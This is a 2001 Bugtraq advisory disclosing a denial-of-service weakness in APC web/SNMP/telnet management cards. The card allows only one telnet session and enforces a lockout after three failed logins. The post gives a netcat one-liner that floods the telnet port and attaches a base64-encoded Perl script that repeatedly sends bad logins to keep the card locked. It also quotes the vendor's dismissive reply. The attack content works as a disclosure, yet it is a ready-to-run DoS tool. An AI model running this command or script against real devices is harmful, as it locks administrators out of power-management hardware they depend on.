Date: Mon, 26 Feb 2001 03:30:08 -0000 From: altomo@NUDEHACKERS.COM Subject: APC web/snmp/telnet management card dos To: BUGTRAQ@SECURITYFOCUS.COM This is a multi-part message in MIME format. ----------part3a99cdc05fbf2 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit altomo@nudehackers.com APC web/snmp management card Some APC products such as the symetra offer the option of adding a management card to allow an admin the ablilty to setup monitoring and notification. The card is accessable by snmp, web interface, and telnet. Itseems that only one telnet connection is allowed at a time.(problem 1). The telnet sesssion is authenticated by a user/password method, if the incorrect combination is entered 3 times no connections are allowed for the defined lockout time. Min. 1 minute, max 10 minutes. (problem 2) Problem 1- Since only one connection is allowed to the telnet port an admin could be kept from connecting. Easy to reproduce. Problem 2- Lock out period. Lock out periods are a good thing, I really do like them. But when no one can connect its a bad thing. Since the lockout period can not be set to 0 an attacker could take advantage of this by sending 3 incorrect login attempts to the unit and repeat every 60 secs using the minimal lockout time. Even if the admin has lockout set to 10 minutes it will keep repeating and work when it actually is enabled again. both of these are easy to reproduce. problem 1 - cat /dev/zero | nc ip-here 23 (ya ya dirty) problem 2 - attempt login 3 times, or run script attached. -Contacting APC - Contacted APC via email and informed they of what had been found and asked if this was going to be addressed in the future. The response received back was: "At this time the security on the web card is at its highest level. The only other suggestion is to make changes on the firewall." Well, not really what I wanted to hear but hey why not. I responded inorder to try one more time and received the same respone back. altomo@nudehackers.com ----------part3a99cdc05fbf2 Content-Type: application/x-perl; name="apcdos.pl" Content-Transfer-Encoding: base64 IyEvdXNyL2Jpbi9wZXJsCiNhbHRvbW9AbnVkZWhhY2tlcnMuY29tCiNhcGMgbWFuYWdlbWVudCBj YXJkIGRvcwoKJHVzZXIgPSAiYmxhY2tzdW4iOwokdGltZSA9ICIkQVJHVlsxXSI7Cgp1c2UgSU86 OlNvY2tldDsKJGlwID0gIiRBUkdWWzBdIjsKJHBvcnQgPSAiMjMiOwppZiAoJCNBUkdWPDApIHsK cHJpbnQgIiB1c2VhZ2U6ICQwIDxob3N0bmFtZT4gPGRlbGF5IGluIHNlY29uZHM+XG4iOwpleGl0 KCk7Cn0KJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldygKUHJvdG89PiJ0Y3AiLApQZWVy QWRkcj0+JGlwLApQZWVyUG9ydD0+JHBvcnQsKTsKCgpwcmludCAiQXBjIG1hbmFnZW1lbnQgY2Fy ZCBEb1NcbiI7CnByaW50ICJhbHRvbW9cQG51ZGVoYWNrZXJzLmNvbVxuIjsKCgpzdWIgZG9zKCkg ewpwcmludCAiRG9TIHN0YXJ0ZWQgd2lsbCBhdHRhY2sgZXZlcnkgJHRpbWUgc2Vjb25kc1xuIjsK cHJpbnQgIkN0cmwrQyB0byBleGl0XG4iOwpwcmludCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQg JHNvY2tldCAiJHVzZXJcciI7CnByaW50ICRzb2NrZXQgIiR1c2VyXHIiOwpwcmludCAkc29ja2V0 ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tldCAiJHVzZXJcciI7CnByaW50ICRzb2NrZXQgIiR1c2Vy XHIiOwpwcmludCAiXG4iOwpjbG9zZSAkc29ja2V0OwpzbGVlcCgkdGltZSk7ICAgICAgICAgIAom ZG9zOwoKfQomZG9zOwojaG9uZyBrb25nIGRhbmdlciBkdW8K